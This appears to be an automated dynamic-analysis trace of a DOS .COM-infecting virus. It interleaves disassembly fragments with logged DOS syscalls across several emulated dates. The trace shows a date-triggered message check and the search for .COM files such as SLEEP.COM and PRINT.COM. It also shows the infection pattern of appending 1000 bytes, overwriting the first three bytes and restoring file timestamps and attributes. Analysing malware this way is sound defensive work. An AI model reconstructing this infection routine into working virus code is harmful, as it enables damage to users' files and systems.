0x12bf7: mov dx, 0xd
0x12bfa: nop
0x12bfb: add dx, si
0x12bfd: int 0x21
0x12bff: jb 0x12c56
0x12c01: cmp ax, 3
0x12c04: jne 0x12c56
0x12c06: mov ax, 0x4202
0x12c09: mov cx, 0
0x12c0c: mov dx, 0
0x12c0f: int 0x21
0x12c11: jb 0x12c56
0x12c13: mov cx, ax
0x12c15: sub ax, 3
0x12c18: mov word ptr [si + 0x11], ax
2018-12-25T12:36:14.537562319Z 63 PC: 12bff | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:36:14.569107904Z 66 PC: 12c11 | Move file pointer
2018-12-25T12:36:14.571844743Z 64 PC: 12c35 | Write file or device (Write 1000 bytes on handle 5)
2018-12-25T12:36:14.582085347Z 66 PC: 12c47 | Move file pointer
2018-12-25T12:36:14.584732765Z 64 PC: 12c56 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:36:14.592387275Z 87 PC: 12c69 | Get or set file date and time
2018-12-25T12:36:14.594486096Z 62 PC: 12c6d | Close file
2018-12-25T12:36:14.605373168Z 67 PC: 12c7c | Get or set file attributes
2018-12-25T12:36:14.617487793Z 26 PC: 12c89 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1990,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12769,"SideJobID":0}

.


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:36:14.467642267Z 48 PC: 12e53 | Get DOS version
2018-12-25T12:36:14.469584659Z 47 PC: 12e5f | Get disk transfer address
2018-12-25T12:36:14.471596439Z 26 PC: 12e72 | Set disk transfer address
2018-12-25T12:36:14.473270957Z 42 PC: 12e82 | Get date
0x12e82: mov dx, 0x7c6
0x12e85: nop
0x12e86: add dx, 0
0x12e89: cmp cx, dx
0x12e8b: jg 0x12eae
0x12e8d: je 0x12e92
0x12e8f: jmp 0x12ede
0x12e91: nop
0x12e92: mov ah, 0x2a
0x12e94: int 0x21
0x12e96: nop
0x12e97: mov bh, 0xa
0x12e99: cmp dh, bh
0x12e9b: jge 0x12ea0
0x12e9d: jmp 0x12ede
0x12e9f: nop
0x12ea0: mov ah, 0x2a
0x12ea2: int 0x21
0x12ea4: nop
0x12ea5: mov bh, 0xa
2018-12-25T12:36:14.48086332Z 42 PC: 12e96 | Get date
0x12e96: nop
0x12e97: mov bh, 0xa
0x12e99: cmp dh, bh
0x12e9b: jge 0x12ea0
0x12e9d: jmp 0x12ede
0x12e9f: nop
0x12ea0: mov ah, 0x2a
0x12ea2: int 0x21
0x12ea4: nop
0x12ea5: mov bh, 0xa
0x12ea7: cmp dl, bh
0x12ea9: jge 0x12eae
0x12eab: jmp 0x12ede
0x12ead: nop
0x12eae: mov dx, 0x1e
0x12eb1: nop
0x12eb2: add dx, si
0x12eb4: mov ah, 9
0x12eb6: int 0x21
0x12eb8: mov byte ptr [0x364], 0
2018-12-25T12:36:14.485512189Z 78 PC: 12f61 | Find first file
2018-12-25T12:36:14.493050333Z 67 PC: 12f9f | Get or set file attributes
2018-12-25T12:36:14.499400372Z 67 PC: 12fb1 | Get or set file attributes
2018-12-25T12:36:14.529156226Z 61 PC: 12fbc | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:36:14.536572341Z 87 PC: 12fc8 | Get or set file date and time
2018-12-25T12:36:14.538575783Z 44 PC: 12fd4 | Get time
0x12fd4: and dh, 7
0x12fd7: jmp 0x12fda
0x12fd9: nop
0x12fda: mov ah, 0x3f
0x12fdc: mov cx, 3
0x12fdf: mov dx, 0xd
0x12fe2: nop
0x12fe3: add dx, si
0x12fe5: int 0x21
0x12fe7: jb 0x1303e
0x12fe9: cmp ax, 3
0x12fec: jne 0x1303e
0x12fee: mov ax, 0x4202
0x12ff1: mov cx, 0
0x12ff4: mov dx, 0
0x12ff7: int 0x21
0x12ff9: jb 0x1303e
0x12ffb: mov cx, ax
0x12ffd: sub ax, 3
0x13000: mov word ptr [si + 0x11], ax
2018-12-25T12:36:14.541707954Z 63 PC: 12fe7 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:36:14.549017704Z 66 PC: 12ff9 | Move file pointer
2018-12-25T12:36:14.551002345Z 64 PC: 1301d | Write file or device (Write 1000 bytes on handle 5)
2018-12-25T12:36:14.561156553Z 66 PC: 1302f | Move file pointer
2018-12-25T12:36:14.563178025Z 64 PC: 1303e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:36:14.570729435Z 87 PC: 13051 | Get or set file date and time
2018-12-25T12:36:14.573075455Z 62 PC: 13055 | Close file
2018-12-25T12:36:14.582865713Z 67 PC: 13064 | Get or set file attributes
2018-12-25T12:36:14.594912925Z 26 PC: 13071 | Set disk transfer address
2018-12-25T12:36:14.597619071Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:36:14.599755375Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:36:14.601405848Z 26 PC: 12a8a | Set disk transfer address
2018-12-25T12:36:14.603436851Z 42 PC: 12a9a | Get date
0x12a9a: mov dx, 0x7c6
0x12a9d: nop
0x12a9e: add dx, 0
0x12aa1: cmp cx, dx
0x12aa3: jg 0x12ac6
0x12aa5: je 0x12aaa
0x12aa7: jmp 0x12af6
0x12aa9: nop
0x12aaa: mov ah, 0x2a
0x12aac: int 0x21
0x12aae: nop
0x12aaf: mov bh, 9
0x12ab1: cmp dh, bh
0x12ab3: jge 0x12ab8
0x12ab5: jmp 0x12af6
0x12ab7: nop
0x12ab8: mov ah, 0x2a
0x12aba: int 0x21
0x12abc: nop
0x12abd: mov bh, 4
2018-12-25T12:36:14.606564878Z 42 PC: 12aae | Get date
0x12aae: nop
0x12aaf: mov bh, 9
0x12ab1: cmp dh, bh
0x12ab3: jge 0x12ab8
0x12ab5: jmp 0x12af6
0x12ab7: nop
0x12ab8: mov ah, 0x2a
0x12aba: int 0x21
0x12abc: nop
0x12abd: mov bh, 4
0x12abf: cmp dl, bh
0x12ac1: jge 0x12ac6
0x12ac3: jmp 0x12af6
0x12ac5: nop
0x12ac6: mov dx, 0x1e
0x12ac9: nop
0x12aca: add dx, si
0x12acc: mov ah, 9
0x12ace: int 0x21
0x12ad0: mov byte ptr [0x364], 0
2018-12-25T12:36:14.609664295Z 78 PC: 12b79 | Find first file
2018-12-25T12:36:14.616722585Z 79 PC: 12b7f | Find next file
2018-12-25T12:36:14.620600383Z 67 PC: 12bb7 | Get or set file attributes
2018-12-25T12:36:14.627701861Z 67 PC: 12bc9 | Get or set file attributes
2018-12-25T12:36:14.638590638Z 61 PC: 12bd4 | Open file (Filename = 'PRINT.COM')
2018-12-25T12:36:14.653675038Z 87 PC: 12be0 | Get or set file date and time
2018-12-25T12:36:14.6696177Z 44 PC: 12bec | Get time
0x12bec: and dh, 7
0x12bef: jmp 0x12bf2
0x12bf1: nop
0x12bf2: mov ah, 0x3f
0x12bf4: mov cx, 3
0x12bf7: mov dx, 0xd
0x12bfa: nop
0x12bfb: add dx, si
0x12bfd: int 0x21
0x12bff: jb 0x12c56
0x12c01: cmp ax, 3
0x12c04: jne 0x12c56
0x12c06: mov ax, 0x4202
0x12c09: mov cx, 0
0x12c0c: mov dx, 0
0x12c0f: int 0x21
0x12c11: jb 0x12c56
0x12c13: mov cx, ax
0x12c15: sub ax, 3
0x12c18: mov word ptr [si + 0x11], ax
2018-12-25T12:36:14.672065385Z 63 PC: 12bff | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:36:14.680582994Z 66 PC: 12c11 | Move file pointer
2018-12-25T12:36:14.682645323Z 64 PC: 12c35 | Write file or device (Write 1000 bytes on handle 5)
2018-12-25T12:36:14.692527685Z 66 PC: 12c47 | Move file pointer
2018-12-25T12:36:14.695164181Z 64 PC: 12c56 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:36:14.702633199Z 87 PC: 12c69 | Get or set file date and time
2018-12-25T12:36:14.704393384Z 62 PC: 12c6d | Close file
2018-12-25T12:36:14.719699007Z 67 PC: 12c7c | Get or set file attributes
2018-12-25T12:36:14.742915928Z 26 PC: 12c89 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1991,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12769,"SideJobID":0}

.


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:36:15.31313777Z 48 PC: 12e53 | Get DOS version
2018-12-25T12:36:15.314558882Z 47 PC: 12e5f | Get disk transfer address
2018-12-25T12:36:15.315577943Z 26 PC: 12e72 | Set disk transfer address
2018-12-25T12:36:15.31645874Z 42 PC: 12e82 | Get date
0x12e82: mov dx, 0x7c6
0x12e85: nop
0x12e86: add dx, 0
0x12e89: cmp cx, dx
0x12e8b: jg 0x12eae
0x12e8d: je 0x12e92
0x12e8f: jmp 0x12ede
0x12e91: nop
0x12e92: mov ah, 0x2a
0x12e94: int 0x21
0x12e96: nop
0x12e97: mov bh, 0xa
0x12e99: cmp dh, bh
0x12e9b: jge 0x12ea0
0x12e9d: jmp 0x12ede
0x12e9f: nop
0x12ea0: mov ah, 0x2a
0x12ea2: int 0x21
0x12ea4: nop
0x12ea5: mov bh, 0xa
2018-12-25T12:36:15.318158426Z 9 PC: 12eb8 | Display string (String= '���������N�3�ֹ�!��O�!s랋��')
2018-12-25T12:36:15.326666237Z 78 PC: 12f61 | Find first file
2018-12-25T12:36:15.330955114Z 67 PC: 12f9f | Get or set file attributes
2018-12-25T12:36:15.334437512Z 67 PC: 12fb1 | Get or set file attributes
2018-12-25T12:36:15.35137248Z 61 PC: 12fbc | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:36:15.360055185Z 87 PC: 12fc8 | Get or set file date and time
2018-12-25T12:36:15.361929708Z 44 PC: 12fd4 | Get time
0x12fd4: and dh, 7
0x12fd7: jmp 0x12fda
0x12fd9: nop
0x12fda: mov ah, 0x3f
0x12fdc: mov cx, 3
0x12fdf: mov dx, 0xd
0x12fe2: nop
0x12fe3: add dx, si
0x12fe5: int 0x21
0x12fe7: jb 0x1303e
0x12fe9: cmp ax, 3
0x12fec: jne 0x1303e
0x12fee: mov ax, 0x4202
0x12ff1: mov cx, 0
0x12ff4: mov dx, 0
0x12ff7: int 0x21
0x12ff9: jb 0x1303e
0x12ffb: mov cx, ax
0x12ffd: sub ax, 3
0x13000: mov word ptr [si + 0x11], ax
2018-12-25T12:36:15.365786378Z 63 PC: 12fe7 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:36:15.371868225Z 66 PC: 12ff9 | Move file pointer
2018-12-25T12:36:15.373692098Z 64 PC: 1301d | Write file or device (Write 1000 bytes on handle 5)
2018-12-25T12:36:15.385200033Z 66 PC: 1302f | Move file pointer
2018-12-25T12:36:15.386805213Z 64 PC: 1303e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:36:15.393063736Z 87 PC: 13051 | Get or set file date and time
2018-12-25T12:36:15.395200239Z 62 PC: 13055 | Close file
2018-12-25T12:36:15.407725782Z 67 PC: 13064 | Get or set file attributes
2018-12-25T12:36:15.417249603Z 26 PC: 13071 | Set disk transfer address
2018-12-25T12:36:15.427117587Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:36:15.428534183Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:36:15.429871723Z 26 PC: 12a8a | Set disk transfer address
2018-12-25T12:36:15.431711891Z 42 PC: 12a9a | Get date
0x12a9a: mov dx, 0x7c6
0x12a9d: nop
0x12a9e: add dx, 0
0x12aa1: cmp cx, dx
0x12aa3: jg 0x12ac6
0x12aa5: je 0x12aaa
0x12aa7: jmp 0x12af6
0x12aa9: nop
0x12aaa: mov ah, 0x2a
0x12aac: int 0x21
0x12aae: nop
0x12aaf: mov bh, 9
0x12ab1: cmp dh, bh
0x12ab3: jge 0x12ab8
0x12ab5: jmp 0x12af6
0x12ab7: nop
0x12ab8: mov ah, 0x2a
0x12aba: int 0x21
0x12abc: nop
0x12abd: mov bh, 4
2018-12-25T12:36:15.43491325Z 9 PC: 12ad0 | Display string (String= '���������N�3�ֹ�!��O�!s랋��')
2018-12-25T12:36:15.443246314Z 78 PC: 12b79 | Find first file
2018-12-25T12:36:15.454722475Z 79 PC: 12b7f | Find next file
2018-12-25T12:36:15.457318688Z 67 PC: 12bb7 | Get or set file attributes
2018-12-25T12:36:15.461552357Z 67 PC: 12bc9 | Get or set file attributes
2018-12-25T12:36:15.474246783Z 61 PC: 12bd4 | Open file (Filename = 'PRINT.COM')
2018-12-25T12:36:15.481475725Z 87 PC: 12be0 | Get or set file date and time
2018-12-25T12:36:15.483070948Z 44 PC: 12bec | Get time
0x12bec: and dh, 7
0x12bef: jmp 0x12bf2
0x12bf1: nop
0x12bf2: mov ah, 0x3f
0x12bf4: mov cx, 3
0x12bf7: mov dx, 0xd
0x12bfa: nop
0x12bfb: add dx, si
0x12bfd: int 0x21
0x12bff: jb 0x12c56
0x12c01: cmp ax, 3
0x12c04: jne 0x12c56
0x12c06: mov ax, 0x4202
0x12c09: mov cx, 0
0x12c0c: mov dx, 0
0x12c0f: int 0x21
0x12c11: jb 0x12c56
0x12c13: mov cx, ax
0x12c15: sub ax, 3
0x12c18: mov word ptr [si + 0x11], ax
2018-12-25T12:36:15.485356042Z 63 PC: 12bff | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:36:15.493402175Z 66 PC: 12c11 | Move file pointer
2018-12-25T12:36:15.494908054Z 64 PC: 12c35 | Write file or device (Write 1000 bytes on handle 5)
2018-12-25T12:36:15.503230062Z 66 PC: 12c47 | Move file pointer
2018-12-25T12:36:15.505235161Z 64 PC: 12c56 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:36:15.511563081Z 87 PC: 12c69 | Get or set file date and time
2018-12-25T12:36:15.513123652Z 62 PC: 12c6d | Close file
2018-12-25T12:36:15.521417838Z 67 PC: 12c7c | Get or set file attributes
2018-12-25T12:36:15.530936689Z 26 PC: 12c89 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12769,"SideJobID":0}

.


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:36:15.660088336Z 48 PC: 12e53 | Get DOS version
2018-12-25T12:36:15.662352882Z 47 PC: 12e5f | Get disk transfer address
2018-12-25T12:36:15.664637295Z 26 PC: 12e72 | Set disk transfer address
2018-12-25T12:36:15.665831878Z 42 PC: 12e82 | Get date
0x12e82: mov dx, 0x7c6
0x12e85: nop
0x12e86: add dx, 0
0x12e89: cmp cx, dx
0x12e8b: jg 0x12eae
0x12e8d: je 0x12e92
0x12e8f: jmp 0x12ede
0x12e91: nop
0x12e92: mov ah, 0x2a
0x12e94: int 0x21
0x12e96: nop
0x12e97: mov bh, 0xa
0x12e99: cmp dh, bh
0x12e9b: jge 0x12ea0
0x12e9d: jmp 0x12ede
0x12e9f: nop
0x12ea0: mov ah, 0x2a
0x12ea2: int 0x21
0x12ea4: nop
0x12ea5: mov bh, 0xa
2018-12-25T12:36:15.668773612Z 78 PC: 12f61 | Find first file
2018-12-25T12:36:15.674663911Z 67 PC: 12f9f | Get or set file attributes
2018-12-25T12:36:15.68053136Z 67 PC: 12fb1 | Get or set file attributes
2018-12-25T12:36:15.698695537Z 61 PC: 12fbc | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:36:15.705451792Z 87 PC: 12fc8 | Get or set file date and time
2018-12-25T12:36:15.707152605Z 44 PC: 12fd4 | Get time
0x12fd4: and dh, 7
0x12fd7: jmp 0x12fda
0x12fd9: nop
0x12fda: mov ah, 0x3f
0x12fdc: mov cx, 3
0x12fdf: mov dx, 0xd
0x12fe2: nop
0x12fe3: add dx, si
0x12fe5: int 0x21
0x12fe7: jb 0x1303e
0x12fe9: cmp ax, 3
0x12fec: jne 0x1303e
0x12fee: mov ax, 0x4202
0x12ff1: mov cx, 0
0x12ff4: mov dx, 0
0x12ff7: int 0x21
0x12ff9: jb 0x1303e
0x12ffb: mov cx, ax
0x12ffd: sub ax, 3
0x13000: mov word ptr [si + 0x11], ax
2018-12-25T12:36:15.709791781Z 63 PC: 12fe7 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:36:15.718381049Z 66 PC: 12ff9 | Move file pointer
2018-12-25T12:36:15.720696533Z 64 PC: 1301d | Write file or device (Write 1000 bytes on handle 5)
2018-12-25T12:36:15.726594596Z 66 PC: 1302f | Move file pointer
2018-12-25T12:36:15.728364252Z 64 PC: 1303e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:36:15.733839882Z 87 PC: 13051 | Get or set file date and time
2018-12-25T12:36:15.735602061Z 62 PC: 13055 | Close file
2018-12-25T12:36:15.743896437Z 67 PC: 13064 | Get or set file attributes
2018-12-25T12:36:15.754024336Z 26 PC: 13071 | Set disk transfer address
2018-12-25T12:36:15.755645157Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:36:15.758121568Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:36:15.759482166Z 26 PC: 12a8a | Set disk transfer address
2018-12-25T12:36:15.760897877Z 42 PC: 12a9a | Get date
0x12a9a: mov dx, 0x7c6
0x12a9d: nop
0x12a9e: add dx, 0
0x12aa1: cmp cx, dx
0x12aa3: jg 0x12ac6
0x12aa5: je 0x12aaa
0x12aa7: jmp 0x12af6
0x12aa9: nop
0x12aaa: mov ah, 0x2a
0x12aac: int 0x21
0x12aae: nop
0x12aaf: mov bh, 9
0x12ab1: cmp dh, bh
0x12ab3: jge 0x12ab8
0x12ab5: jmp 0x12af6
0x12ab7: nop
0x12ab8: mov ah, 0x2a
0x12aba: int 0x21
0x12abc: nop
0x12abd: mov bh, 4
2018-12-25T12:36:15.764730134Z 78 PC: 12b79 | Find first file
2018-12-25T12:36:15.770781168Z 79 PC: 12b7f | Find next file
2018-12-25T12:36:15.773430792Z 67 PC: 12bb7 | Get or set file attributes
2018-12-25T12:36:15.780641159Z 67 PC: 12bc9 | Get or set file attributes
2018-12-25T12:36:15.793253721Z 61 PC: 12bd4 | Open file (Filename = 'PRINT.COM')
2018-12-25T12:36:15.799661524Z 87 PC: 12be0 | Get or set file date and time
2018-12-25T12:36:15.801216585Z 44 PC: 12bec | Get time
0x12bec: and dh, 7
0x12bef: jmp 0x12bf2
0x12bf1: nop
0x12bf2: mov ah, 0x3f
0x12bf4: mov cx, 3
0x12bf7: mov dx, 0xd
0x12bfa: nop
0x12bfb: add dx, si
0x12bfd: int 0x21
0x12bff: jb 0x12c56
0x12c01: cmp ax, 3
0x12c04: jne 0x12c56
0x12c06: mov ax, 0x4202
0x12c09: mov cx, 0
0x12c0c: mov dx, 0
0x12c0f: int 0x21
0x12c11: jb 0x12c56
0x12c13: mov cx, ax
0x12c15: sub ax, 3
0x12c18: mov word ptr [si + 0x11], ax
2018-12-25T12:36:15.803489455Z 63 PC: 12bff | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:36:15.809881827Z 66 PC: 12c11 | Move file pointer
2018-12-25T12:36:15.811843153Z 64 PC: 12c35 | Write file or device (Write 1000 bytes on handle 5)
2018-12-25T12:36:15.82147112Z 66 PC: 12c47 | Move file pointer
2018-12-25T12:36:15.822879315Z 64 PC: 12c56 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:36:15.829261084Z 87 PC: 12c69 | Get or set file date and time
2018-12-25T12:36:15.831340574Z 62 PC: 12c6d | Close file
2018-12-25T12:36:15.839104862Z 67 PC: 12c7c | Get or set file attributes
2018-12-25T12:36:15.848954817Z 26 PC: 12c89 | Set disk transfer address